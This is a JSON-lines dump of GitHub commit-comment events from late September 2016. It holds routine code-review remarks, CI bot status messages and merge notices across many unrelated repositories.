{"id":"4629168218","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19203865,"position":67,"line":301,"path":"static/js/controllers/contacts-content.js","commit_id":"14c6f9c06eba1f839d7e70dbbc05610ec91a766f","created_at":"2016-09-28T08:21:02Z","updated_at":"2016-09-28T08:21:02Z","body":"Yeah, I thought about this : I don't know if there's a performance tradeoff.\r\n\r\nBesides performance, I like it better in the controller because controller code is testable. I felt like that template was getting too much unchecked decision power :) \r\nI would leave it in the template if it's a feature that we don't care too much about breaking. But getting the order wrong makes the list hard to parse with human eyes and brains, so I'm happier testing it.\r\n\r\nThe other instance of that, which you pointed out in your other comment, is displaying only the unresolved tasks. Definitely a feature you want to ensure, otherwise could get really confusing."}},"created_at":"2016-09-28T08:21:02Z"}
{"id":"4629170183","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Defake/Triangle_01"},"payload":{"comment":{"id":19203870,"position":37,"line":32,"path":"Triangle.Test/TriangleTest.cs","commit_id":"b19f312417a9bb01677822e2ebadb0fb956765f8","created_at":"2016-09-28T08:21:28Z","updated_at":"2016-09-28T08:21:28Z","body":"Не обязательно параметры выносить в переменные в данном случае"}},"created_at":"2016-09-28T08:21:28Z"}
{"id":"4629174272","type":"CommitCommentEvent","actor":{"login":"mmishalov"},"repo":{"name":"HPSoftware/hubot-bpm"},"payload":{"comment":{"id":19203875,"position":7,"line":4,"path":"bpm-config.json","commit_id":"49c66fad880ca9c3d7dee7ebe6b4bfbf181ef65d","created_at":"2016-09-28T08:22:25Z","updated_at":"2016-09-28T08:22:25Z","body":"please revert commit to this file.."}},"created_at":"2016-09-28T08:22:25Z"}
{"id":"4629177831","type":"CommitCommentEvent","actor":{"login":"foosel"},"repo":{"name":"foosel/OctoPrint"},"payload":{"comment":{"id":19203882,"position":null,"line":null,"path":null,"commit_id":"d9e3553c7c4e18646f1d360822eeb07ba6586e95","created_at":"2016-09-28T08:23:15Z","updated_at":"2016-09-28T08:23:15Z","body":"Ok, readded in commit 82ae3f6f6e09b0a2d01fb4759a2bfcaf52e79a4e. Renamed to ``pathForEntry`` and ``entryForPath`` but also left the old names working, just with an additional deprecation warning being logged. Also added docs."}},"created_at":"2016-09-28T08:23:15Z"}
{"id":"4629177844","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Defake/Triangle_01"},"payload":{"comment":{"id":19203883,"position":23,"line":22,"path":"Triangle_01/Triangle.cs","commit_id":"b19f312417a9bb01677822e2ebadb0fb956765f8","created_at":"2016-09-28T08:23:15Z","updated_at":"2016-09-28T08:23:15Z","body":"Длинная строка, вынесите лучше в переменную результат расчета"}},"created_at":"2016-09-28T08:23:15Z"}
{"id":"4629179177","type":"CommitCommentEvent","actor":{"login":"xiaowangzi0224"},"repo":{"name":"twbs/bootstrap"},"payload":{"comment":{"id":19203886,"position":null,"line":null,"path":null,"commit_id":"13e4348dfd78c0f1a28d5a108a4ec4f55de1271a","created_at":"2016-09-28T08:23:30Z","updated_at":"2016-09-28T08:23:30Z","body":"very good"}},"created_at":"2016-09-28T08:23:30Z"}
{"id":"4629183202","type":"CommitCommentEvent","actor":{"login":"teethcare"},"repo":{"name":"teethcare/dj2016"},"payload":{"comment":{"id":19203893,"position":1,"line":1,"path":"homework/P.A.F/homework2","commit_id":"f543bbdbfccba9f8a315710074ca5916c1ae3303","created_at":"2016-09-28T08:24:29Z","updated_at":"2016-09-28T08:24:29Z","body":"[Homework2.zip](https://github.com/teethcare/dj2016/files/497462/Homework2.zip)\r\n"}},"created_at":"2016-09-28T08:24:29Z"}
{"id":"4629183416","type":"CommitCommentEvent","actor":{"login":"winterwake"},"repo":{"name":"winterwake/RK3288-"},"payload":{"comment":{"id":19203894,"position":null,"line":null,"path":null,"commit_id":"f2932a0bc48eb774707921a20a83429963b82be9","created_at":"2016-09-28T08:24:31Z","updated_at":"2016-09-28T08:24:31Z","body":"编译&升级"}},"created_at":"2016-09-28T08:24:31Z"}
{"id":"4629183560","type":"CommitCommentEvent","actor":{"login":"atumanian"},"repo":{"name":"atumanian/Stockfish"},"payload":{"comment":{"id":19203897,"position":null,"line":null,"path":null,"commit_id":"4a8b7be42caa13af8e50937cbdd96a1c4738de76","created_at":"2016-09-28T08:24:33Z","updated_at":"2016-09-28T08:24:33Z","body":"Sorry, this is my first SPSA test. I've resheduled the test with the correct braches."}},"created_at":"2016-09-28T08:24:33Z"}
{"id":"4629184926","type":"CommitCommentEvent","actor":{"login":"crazyjul"},"repo":{"name":"FishingCactus/openfl"},"payload":{"comment":{"id":19203899,"position":null,"line":null,"path":null,"commit_id":"db52625f9b564e73bca9c23ff43d98f7c61932cc","created_at":"2016-09-28T08:24:52Z","updated_at":"2016-09-28T08:24:52Z","body":"Yes, we know, this was to pass the task to Ramses\n\nSent from my iPhone\n\n> On 28 sept. 2016, at 10:18, Pieter Vantorre <notifications@github.com> wrote:\n> \n> Just to let you know, branch is not compiling without mask_as_bitmap flag\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-28T08:24:52Z"}
{"id":"4629184950","type":"CommitCommentEvent","actor":{"login":"guillaumebourdeau"},"repo":{"name":"guillaumebourdeau/hello-world"},"payload":{"comment":{"id":19203900,"position":null,"line":null,"path":null,"commit_id":"2af70b4e18901f2232505f0c4c11ccc17024bb02","created_at":"2016-09-28T08:24:52Z","updated_at":"2016-09-28T08:24:52Z","body":"test"}},"created_at":"2016-09-28T08:24:52Z"}
{"id":"4629185764","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19203902,"position":null,"line":null,"path":null,"commit_id":"da39a99e542db4f41cb3618da42cd4b1fb09abc9","created_at":"2016-09-28T08:25:03Z","updated_at":"2016-09-28T08:25:03Z","body":"all tests pass:\nsuccess: https://travis-ci.org/stellar/stellar-core/builds/163331536\n"}},"created_at":"2016-09-28T08:25:03Z"}
{"id":"4629187859","type":"CommitCommentEvent","actor":{"login":"previmeteo"},"repo":{"name":"previmeteo/weewx"},"payload":{"comment":{"id":19203907,"position":13,"line":13,"path":"extensions/previmeteo/readme.txt","commit_id":"f750b7684f2d8b522656b1ebf4c4faf99cd02f66","created_at":"2016-09-28T08:25:31Z","updated_at":"2016-09-28T08:25:31Z","body":"Erratum : [[Previmeteo]]"}},"created_at":"2016-09-28T08:25:31Z"}
{"id":"4629189514","type":"CommitCommentEvent","actor":{"login":"previmeteo"},"repo":{"name":"previmeteo/weewx"},"payload":{"comment":{"id":19203910,"position":14,"line":14,"path":"extensions/previmeteo/readme.txt","commit_id":"f750b7684f2d8b522656b1ebf4c4faf99cd02f66","created_at":"2016-09-28T08:25:52Z","updated_at":"2016-09-28T08:25:52Z","body":"station = STATION_ID"}},"created_at":"2016-09-28T08:25:52Z"}
{"id":"4629190354","type":"CommitCommentEvent","actor":{"login":"previmeteo"},"repo":{"name":"previmeteo/weewx"},"payload":{"comment":{"id":19203912,"position":15,"line":15,"path":"extensions/previmeteo/readme.txt","commit_id":"f750b7684f2d8b522656b1ebf4c4faf99cd02f66","created_at":"2016-09-28T08:26:03Z","updated_at":"2016-09-28T08:26:03Z","body":"password = PASSWORD"}},"created_at":"2016-09-28T08:26:03Z"}
{"id":"4629196723","type":"CommitCommentEvent","actor":{"login":"jiaohaitao"},"repo":{"name":"jiaohaitao/stsw-stm8004"},"payload":{"comment":{"id":19203922,"position":11,"line":51,"path":"AN3281/Project/STM8S/STM8S_I2C_Slave/src/main.c","commit_id":"b54e6380cd06f543f0f6acce75b633ef4b800019","created_at":"2016-09-28T08:27:17Z","updated_at":"2016-09-28T08:27:17Z","body":"iic pin modify PB4-SCL PB5-SDA"}},"created_at":"2016-09-28T08:27:17Z"}
{"id":"4629198031","type":"CommitCommentEvent","actor":{"login":"aditheking"},"repo":{"name":"Cosmic-OS/android_frameworks_opt_telephony"},"payload":{"comment":{"id":19203924,"position":null,"line":null,"path":null,"commit_id":"f2759904ed1e77d43ad6383315b20b944aadb883","created_at":"2016-09-28T08:27:35Z","updated_at":"2016-09-28T08:27:35Z","body":"lol"}},"created_at":"2016-09-28T08:27:35Z"}
{"id":"4629203369","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19203938,"position":null,"line":null,"path":null,"commit_id":"e34c5e00c52cc7b86a61246d095d4691a957dbce","created_at":"2016-09-28T08:28:40Z","updated_at":"2016-09-28T08:28:40Z","body":"very good !)"}},"created_at":"2016-09-28T08:28:40Z"}
{"id":"4629208135","type":"CommitCommentEvent","actor":{"login":"koenpunt"},"repo":{"name":"actuallymentor/Setup-Script-Nginx-Pagespeed-PHP7-Mariadb"},"payload":{"comment":{"id":19203946,"position":12,"line":12,"path":"setup.sh","commit_id":"c2ed6c834398a5a209117419c287b5d5baa653a2","created_at":"2016-09-28T08:29:41Z","updated_at":"2016-09-28T08:29:41Z","body":"Sure, no problem"}},"created_at":"2016-09-28T08:29:41Z"}
{"id":"4629209721","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19203949,"position":null,"line":null,"path":null,"commit_id":"da39a99e542db4f41cb3618da42cd4b1fb09abc9","created_at":"2016-09-28T08:30:02Z","updated_at":"2016-09-28T08:30:02Z","body":"fast-forwarding master to auto = 48a9b8cd"}},"created_at":"2016-09-28T08:30:02Z"}
{"id":"4629210208","type":"CommitCommentEvent","actor":{"login":"bull610"},"repo":{"name":"teamdotgetName/startover"},"payload":{"comment":{"id":19203950,"position":18,"line":18,"path":"The Name GUI/src/com/namegui/Window.java","commit_id":"282af0348725028db50044380c0436d4d47284cf","created_at":"2016-09-28T08:30:09Z","updated_at":"2016-09-28T08:30:09Z","body":"This method will build the frame. It will be implemented soon!"}},"created_at":"2016-09-28T08:30:09Z"}
{"id":"4629216672","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19203964,"position":null,"line":null,"path":null,"commit_id":"3cd020babadfc51fa2ee47d27f2a9faed413716b","created_at":"2016-09-28T08:31:29Z","updated_at":"2016-09-28T08:31:29Z","body":"good to see your help! thanks "}},"created_at":"2016-09-28T08:31:29Z"}
{"id":"4629217338","type":"CommitCommentEvent","actor":{"login":"karlzhang-hhg"},"repo":{"name":"karlzhang-hhg/IKPCA"},"payload":{"comment":{"id":19203965,"position":null,"line":null,"path":null,"commit_id":"4be8c45d5a54d68f75d8d359761e752a233adb86","created_at":"2016-09-28T08:31:38Z","updated_at":"2016-09-28T08:31:38Z","body":"The translation vector is not very flexible, so that the projection is somehow rotated. To get a better projection, I need use more parameters for the translation vector."}},"created_at":"2016-09-28T08:31:38Z"}
{"id":"4629218731","type":"CommitCommentEvent","actor":{"login":"popravich"},"repo":{"name":"KeepSafe/aiohttp"},"payload":{"comment":{"id":19203973,"position":5,"line":1407,"path":"docs/web_reference.rst","commit_id":"b7ca576939b13640797576e034d777dbf3f94810","created_at":"2016-09-28T08:31:56Z","updated_at":"2016-09-28T08:31:56Z","body":" `\\` missing"}},"created_at":"2016-09-28T08:31:56Z"}
{"id":"4629221235","type":"CommitCommentEvent","actor":{"login":"ncuillery"},"repo":{"name":"ncuillery/react-native"},"payload":{"comment":{"id":19203978,"position":null,"line":null,"path":null,"commit_id":"838b6c8121e15e29fe0f03cda6410933c35e1d7a","created_at":"2016-09-28T08:32:28Z","updated_at":"2016-09-28T08:32:28Z","body":"No I'm wrong, it just read this: https://github.com/facebook/react-native/blob/master/local-cli/cli.js#L11-L19\r\n\r\nIt reuses the packager's config [here](https://github.com/facebook/react-native/blob/master/packager/babelRegisterOnly.js)"}},"created_at":"2016-09-28T08:32:28Z"}
{"id":"4629223254","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19203979,"position":null,"line":null,"path":null,"commit_id":"01fbd1a0ef7a9fdf30decdc9a9ac89cb396b400b","created_at":"2016-09-28T08:32:52Z","updated_at":"2016-09-28T08:32:52Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#DBIvsLBQSQ2nfnYjfvLMPQ"}},"created_at":"2016-09-28T08:32:52Z"}
{"id":"4629223592","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19203980,"position":6,"line":102,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/main/java/com/xpn/xwiki/web/XWikiServletRequestStub.java","commit_id":"75490835df767d99ff40d3a5bd4eacf2cf137f76","created_at":"2016-09-28T08:32:56Z","updated_at":"2016-09-28T08:32:56Z","body":"typo"}},"created_at":"2016-09-28T08:32:56Z"}
{"id":"4629223649","type":"CommitCommentEvent","actor":{"login":"YoshiteruIwasaki"},"repo":{"name":"aipocom/aipo"},"payload":{"comment":{"id":19203981,"position":7,"line":288,"path":"war/src/main/webapp/javascript/aipo/aipo.js","commit_id":"92be3839157be0140377605e3919f1dcc0da37b1","created_at":"2016-09-28T08:32:57Z","updated_at":"2016-09-28T08:32:57Z","body":"バージョン番号が２桁（10_0のケース）のパターンがあるようです。\r\n\r\n\"mozilla/5.0 (iphone; cpu iphone os 10_0 like mac os x) applewebkit/602.1.50 (khtml, like gecko) version/10.0 mobile/14a345 safari/602.1\"\r\n\r\nhttp://www13.plala.or.jp/bigdata/user_agent.html"}},"created_at":"2016-09-28T08:32:57Z"}
{"id":"4629223987","type":"CommitCommentEvent","actor":{"login":"mingwandroid"},"repo":{"name":"conda/conda-build"},"payload":{"comment":{"id":19203983,"position":null,"line":null,"path":null,"commit_id":"39503ec42da8d71d16f9ce4cf050abe507f7b2b9","created_at":"2016-09-28T08:33:02Z","updated_at":"2016-09-28T08:33:02Z","body":"I suspect this is a shell script and *not* a binary."}},"created_at":"2016-09-28T08:33:02Z"}
{"id":"4629224211","type":"CommitCommentEvent","actor":{"login":"779046074"},"repo":{"name":"lizhangqu/CoreUtil"},"payload":{"comment":{"id":19203984,"position":null,"line":null,"path":null,"commit_id":"76127bd1203018e3e70e46e7ec2c1a1868dd1007","created_at":"2016-09-28T08:33:05Z","updated_at":"2016-09-28T08:33:05Z","body":"现有项目用的AsyncHttpClient,但是其中引用的是import org.apache.http.conn.ssl.SSLSocketFactory;\r\n 而不是您这里用到的javax.net.ssl.SSLSocketFactory;，当setSslSocketFactory(socketFactory);的时候报错，不被允许，请问这个如何解决啊。"}},"created_at":"2016-09-28T08:33:05Z"}
{"id":"4629224773","type":"CommitCommentEvent","actor":{"login":"Dmitry-Me"},"repo":{"name":"danmar/cppcheck"},"payload":{"comment":{"id":19203987,"position":18,"line":1444,"path":"lib/tokenize.cpp","commit_id":"659263802205de68eee3b987d9a5710faa337e38","created_at":"2016-09-28T08:33:12Z","updated_at":"2016-09-28T08:33:12Z","body":"Same with VC++ (which you can see in AppVeyor build logs). Both gcc and VC++ emit false positives here - `tok3` is only used after it was set. Setting it to null pointer at declaration point won't hurt anyway."}},"created_at":"2016-09-28T08:33:12Z"}
{"id":"4629228382","type":"CommitCommentEvent","actor":{"login":"asvetlov"},"repo":{"name":"KeepSafe/aiohttp"},"payload":{"comment":{"id":19204000,"position":5,"line":1407,"path":"docs/web_reference.rst","commit_id":"b7ca576939b13640797576e034d777dbf3f94810","created_at":"2016-09-28T08:33:58Z","updated_at":"2016-09-28T08:33:58Z","body":"Thanks. Fixed by 94e0fb6"}},"created_at":"2016-09-28T08:33:58Z"}
{"id":"4629233286","type":"CommitCommentEvent","actor":{"login":"bobo199303207172"},"repo":{"name":"bobo199303207172/test1"},"payload":{"comment":{"id":19204007,"position":null,"line":null,"path":null,"commit_id":"cc78885bf68f5765e0910e0a9b81a5d5677c10c1","created_at":"2016-09-28T08:34:58Z","updated_at":"2016-09-28T08:34:58Z","body":"sb"}},"created_at":"2016-09-28T08:34:58Z"}
{"id":"4629233610","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19204008,"position":null,"line":null,"path":null,"commit_id":"bff068c1cb6507e480cd7f473c352a3877626b03","created_at":"2016-09-28T08:35:02Z","updated_at":"2016-09-28T08:35:02Z","body":"saw approval from jedmccaleb\nat https://github.com/vogel/stellar-core/commit/bff068c1cb6507e480cd7f473c352a3877626b03"}},"created_at":"2016-09-28T08:35:02Z"}
{"id":"4629233629","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19204009,"position":null,"line":null,"path":null,"commit_id":"bff068c1cb6507e480cd7f473c352a3877626b03","created_at":"2016-09-28T08:35:02Z","updated_at":"2016-09-28T08:35:02Z","body":"merging vogel/stellar-core/tmp-dir-setting-removed = bff068c1 into auto"}},"created_at":"2016-09-28T08:35:02Z"}
{"id":"4629233664","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19204011,"position":null,"line":null,"path":null,"commit_id":"bff068c1cb6507e480cd7f473c352a3877626b03","created_at":"2016-09-28T08:35:02Z","updated_at":"2016-09-28T08:35:02Z","body":"vogel/stellar-core/tmp-dir-setting-removed = bff068c1 merged ok, testing candidate = 9280dd09"}},"created_at":"2016-09-28T08:35:02Z"}
{"id":"4629235809","type":"CommitCommentEvent","actor":{"login":"buddha87"},"repo":{"name":"humhub/humhub-modules-custom-pages"},"payload":{"comment":{"id":19204016,"position":null,"line":null,"path":null,"commit_id":"b2bff948725aaa0cd98456c67e7560b0cb98ca5e","created_at":"2016-09-28T08:35:30Z","updated_at":"2016-09-28T08:35:30Z","body":"I think this is still not possible, the $defaultRoute expects an raw yii route. but I haven't tested it."}},"created_at":"2016-09-28T08:35:30Z"}
{"id":"4629235840","type":"CommitCommentEvent","actor":{"login":"NicolasPetton"},"repo":{"name":"manuel-uberti/.emacs.d"},"payload":{"comment":{"id":19204017,"position":4,"line":176,"path":"lisp/mu-style.el","commit_id":"dc7679e2fb358a4184f76c1f06ade8a0682a6c7c","created_at":"2016-09-28T08:35:31Z","updated_at":"2016-09-28T08:35:31Z","body":"I have made some personal changes to my modeline, and I'm thinking about making it available in zerodark.\r\n\r\n![screenshot from 2016-09-28 10-35-05](https://cloud.githubusercontent.com/assets/123539/18906290/41681efe-8567-11e6-8587-f77c5d9364c6.png)\r\n"}},"created_at":"2016-09-28T08:35:31Z"}
{"id":"4629235893","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19204018,"position":1,"line":1,"path":"src/goto-programs/interpreter_class.h","commit_id":"d7e8294357d6d3293671043ab341f0526cdec092","created_at":"2016-09-28T08:35:31Z","updated_at":"2016-09-28T08:35:31Z","body":"Elsewhere the convention is #ifndef SOME_TAG_H etc"}},"created_at":"2016-09-28T08:35:31Z"}
{"id":"4629236380","type":"CommitCommentEvent","actor":{"login":"andy1138"},"repo":{"name":"scala/scala-lang"},"payload":{"comment":{"id":19204020,"position":null,"line":null,"path":null,"commit_id":"50abef9265c770b4eddd3c08c4a9b7f4e1ee5f17","created_at":"2016-09-28T08:35:39Z","updated_at":"2016-09-28T08:35:39Z","body":"@SethTisue  @heathermiller \r\n\r\nThis is not correct on scala-lang. Its appeared in the 'what's new' section of the home page. \r\n\r\nIs there a line similar to 'category: event' for training that should be added ?  (Locally I added  'category: event' and  this moved the item into the training section but the link-out didn't work )\r\n\r\n"}},"created_at":"2016-09-28T08:35:39Z"}
{"id":"4629236463","type":"CommitCommentEvent","actor":{"login":"Creeperface01"},"repo":{"name":"Nukkit/Nukkit"},"payload":{"comment":{"id":19204021,"position":null,"line":null,"path":null,"commit_id":"dfd915041a8baa31a9ee65a29ffc2c5ab8e41db1","created_at":"2016-09-28T08:35:40Z","updated_at":"2016-09-28T08:35:40Z","body":"@Snake1999 can you explain me this?"}},"created_at":"2016-09-28T08:35:40Z"}
{"id":"4629237285","type":"CommitCommentEvent","actor":{"login":"toxa-ak88"},"repo":{"name":"Adam198590/JavaSerializatorProj"},"payload":{"comment":{"id":19204025,"position":31,"line":31,"path":"src/main/java/enums/PacketType.java","commit_id":"7497e501c2ed2abdfc18a1979e316c1e419f5352","created_at":"2016-09-28T08:35:51Z","updated_at":"2016-09-28T08:35:51Z","body":"Better to use `map.getOrDefault(UNKNOWN);` instead."}},"created_at":"2016-09-28T08:35:51Z"}
{"id":"4629239554","type":"CommitCommentEvent","actor":{"login":"ByScripts"},"repo":{"name":"moreartyjs/moreartyjs"},"payload":{"comment":{"id":19204031,"position":14,"line":106,"path":"src/Binding.js","commit_id":"a7ba0343f722989a47a73b2cc17978cdcf328c23","created_at":"2016-09-28T08:36:20Z","updated_at":"2016-09-28T08:36:20Z","body":"Shouldn't the second `value` be `newValue` ?"}},"created_at":"2016-09-28T08:36:20Z"}
{"id":"4629242113","type":"CommitCommentEvent","actor":{"login":"Ninei"},"repo":{"name":"Ninei/NettyTest"},"payload":{"comment":{"id":19204039,"position":null,"line":null,"path":null,"commit_id":"50751f78706f642615c068a9dd01a499ded1448f","created_at":"2016-09-28T08:36:53Z","updated_at":"2016-09-28T08:36:53Z","body":"Merge remote-tracking branch 'origin/master'"}},"created_at":"2016-09-28T08:36:53Z"}
{"id":"4629251324","type":"CommitCommentEvent","actor":{"login":"JollyAlpaca"},"repo":{"name":"JollyAlpaca/hello-world"},"payload":{"comment":{"id":19204059,"position":null,"line":null,"path":null,"commit_id":"c373bc413f347c37e7f72a66d7699bbb8d02751d","created_at":"2016-09-28T08:38:51Z","updated_at":"2016-09-28T08:38:51Z","body":"I will be storing **useless** files in here... I mean for testing purposes and that's beacause I'm just another noob in this splendid world of programming. (I know my english kind of sucks at the moment, but I will \"keep it up!\") Hurray!"}},"created_at":"2016-09-28T08:38:51Z"}
{"id":"4629251375","type":"CommitCommentEvent","actor":{"login":"torodev"},"repo":{"name":"torodev/myRepo"},"payload":{"comment":{"id":19204060,"position":3,"line":null,"path":"README.md","commit_id":"0face8743089e242efaaaa0c2cc46b6117a396cb","created_at":"2016-09-28T08:38:52Z","updated_at":"2016-09-28T08:38:52Z","body":"Why do this?"}},"created_at":"2016-09-28T08:38:52Z"}
{"id":"4629253607","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19204064,"position":null,"line":null,"path":null,"commit_id":"6b40ebbb7e9f3925c12b1159ef09c5d163807532","created_at":"2016-09-28T08:39:22Z","updated_at":"2016-09-28T08:39:22Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1185](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14439&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-28T08:39:22Z"}
{"id":"4629258229","type":"CommitCommentEvent","actor":{"login":"dikys"},"repo":{"name":"dikys/C-courses"},"payload":{"comment":{"id":19204073,"position":118,"line":94,"path":"Task1/Triangle.cs","commit_id":"b12cfa6a4358e55d1cf6f1e4cae268f63cb904a9","created_at":"2016-09-28T08:40:19Z","updated_at":"2016-09-28T08:40:19Z","body":"Проверка. Так надо? Я нажал ответить всем. Отпишитесь пожалуйста в телеграмм или сюда.\n\n\n>Среда, 28 сентября 2016, 13:17 +05:00 от Alexander Kozko <notifications@github.com>:\n>\n>Сейчас тоже не понятно, потому что я забываю с чего начиналось название, когда дочитываю его до конца)\n>—\n>You are receiving this because you commented.\n>Reply to this email directly,  view it on GitHub , or  mute the thread .\n\n"}},"created_at":"2016-09-28T08:40:19Z"}
{"id":"4629262225","type":"CommitCommentEvent","actor":{"login":"onishiweb"},"repo":{"name":"Financial-Times/origami-build-service"},"payload":{"comment":{"id":19204077,"position":null,"line":null,"path":null,"commit_id":"dd6e164eb51c26a5afa291ca055a4d5bc5391b05","created_at":"2016-09-28T08:41:12Z","updated_at":"2016-09-28T08:41:12Z","body":"Good point 👍 "}},"created_at":"2016-09-28T08:41:12Z"}
{"id":"4629267009","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19204085,"position":null,"line":null,"path":null,"commit_id":"497fc46c6c3b1b08640b58df73066eec26fe70d5","created_at":"2016-09-28T08:42:16Z","updated_at":"2016-09-28T08:42:16Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 273](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1247&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-28T08:42:16Z"}
{"id":"4629270044","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19204090,"position":67,"line":1298,"path":"src/test_gen/java_test_source_factory.cpp","commit_id":"43b94e06fae9c63f38a929a792326a259380d778","created_at":"2016-09-28T08:42:54Z","updated_at":"2016-09-28T08:42:54Z","body":"I think you could get this effect more briefly by using expr2java on ops[fieldidx], which already represents short and byte types using a cast, and long types using an L suffix. Then use \".equals\" for the comparison, since Reflector will give you an `Object` back."}},"created_at":"2016-09-28T08:42:54Z"}
{"id":"4629273595","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19204096,"position":78,"line":1309,"path":"src/test_gen/java_test_source_factory.cpp","commit_id":"43b94e06fae9c63f38a929a792326a259380d778","created_at":"2016-09-28T08:43:42Z","updated_at":"2016-09-28T08:43:42Z","body":"Same goes here -- `expr2java` will give you an appropriate expression and then use `getInstanceField(...).equals`."}},"created_at":"2016-09-28T08:43:42Z"}
{"id":"4629275559","type":"CommitCommentEvent","actor":{"login":"bonion"},"repo":{"name":"bonion/Domoleaf"},"payload":{"comment":{"id":19204106,"position":null,"line":null,"path":null,"commit_id":"99f9e78ecc645d8daaa638a84264a1c95e0c753b","created_at":"2016-09-28T08:44:09Z","updated_at":"2016-09-28T08:44:09Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [DB connection sometimes fails.](https://trello.com/c/GKHV6zVd/120-db-connection-sometimes-fails)"}},"created_at":"2016-09-28T08:44:09Z"}
{"id":"4629279104","type":"CommitCommentEvent","actor":{"login":"nekodex"},"repo":{"name":"LiquidPL/osu-web"},"payload":{"comment":{"id":19204115,"position":null,"line":null,"path":null,"commit_id":"69ecdc38e749827c52bb1b50446b21963497fc8d","created_at":"2016-09-28T08:44:55Z","updated_at":"2016-09-28T08:44:55Z","body":"Uh, so this will affect all the places BBCode is used, i.e. forums and userprofiles, etc... not sure we want that 😛 "}},"created_at":"2016-09-28T08:44:55Z"}
{"id":"4629284277","type":"CommitCommentEvent","actor":{"login":"toxa-ak88"},"repo":{"name":"Adam198590/JavaSerializatorProj"},"payload":{"comment":{"id":19204126,"position":9,"line":8,"path":"src/main/java/model/UserData.java","commit_id":"7497e501c2ed2abdfc18a1979e316c1e419f5352","created_at":"2016-09-28T08:45:58Z","updated_at":"2016-09-28T08:45:58Z","body":"Missed `@Override` annotation on implemented methods."}},"created_at":"2016-09-28T08:45:58Z"}
{"id":"4629284914","type":"CommitCommentEvent","actor":{"login":"tomjenkinson"},"repo":{"name":"mmusgrov/narayana"},"payload":{"comment":{"id":19204127,"position":5,"line":106,"path":"ArjunaJTS/idl/idlj-j9/pom.xml","commit_id":"4620d5895ae47ec85ea0d8e9ca157022992c4420","created_at":"2016-09-28T08:46:05Z","updated_at":"2016-09-28T08:46:05Z","body":"The problem is these need to be on separate lines"}},"created_at":"2016-09-28T08:46:05Z"}
{"id":"4629287757","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19204133,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-28T08:46:39Z","updated_at":"2016-09-28T08:46:39Z","body":"Well, it was just meant as a thin wrapper to avoid code-duplication of\r\n\r\n```php\r\necho json_encode(array(\r\n  'success' => true,\r\n  'message' => $blabla\r\n));\r\n```\r\n\r\nWe might want to add something similar to backbone so we don't have to manually output success/error popups."}},"created_at":"2016-09-28T08:46:39Z"}
{"id":"4629289619","type":"CommitCommentEvent","actor":{"login":"furzeface"},"repo":{"name":"gbbns/gbbns.github.io"},"payload":{"comment":{"id":19204138,"position":5,"line":4,"path":"_includes/about.html","commit_id":"040a675e7f9077620258440c19cabff55987fdc4","created_at":"2016-09-28T08:47:00Z","updated_at":"2016-09-28T08:47:00Z","body":"Liking the user of `&rsquo;` 😛 "}},"created_at":"2016-09-28T08:47:00Z"}
{"id":"4629291323","type":"CommitCommentEvent","actor":{"login":"furzeface"},"repo":{"name":"gbbns/gbbns.github.io"},"payload":{"comment":{"id":19204143,"position":16,"line":41,"path":"_layouts/post.html","commit_id":"040a675e7f9077620258440c19cabff55987fdc4","created_at":"2016-09-28T08:47:19Z","updated_at":"2016-09-28T08:47:19Z","body":"👍 "}},"created_at":"2016-09-28T08:47:19Z"}
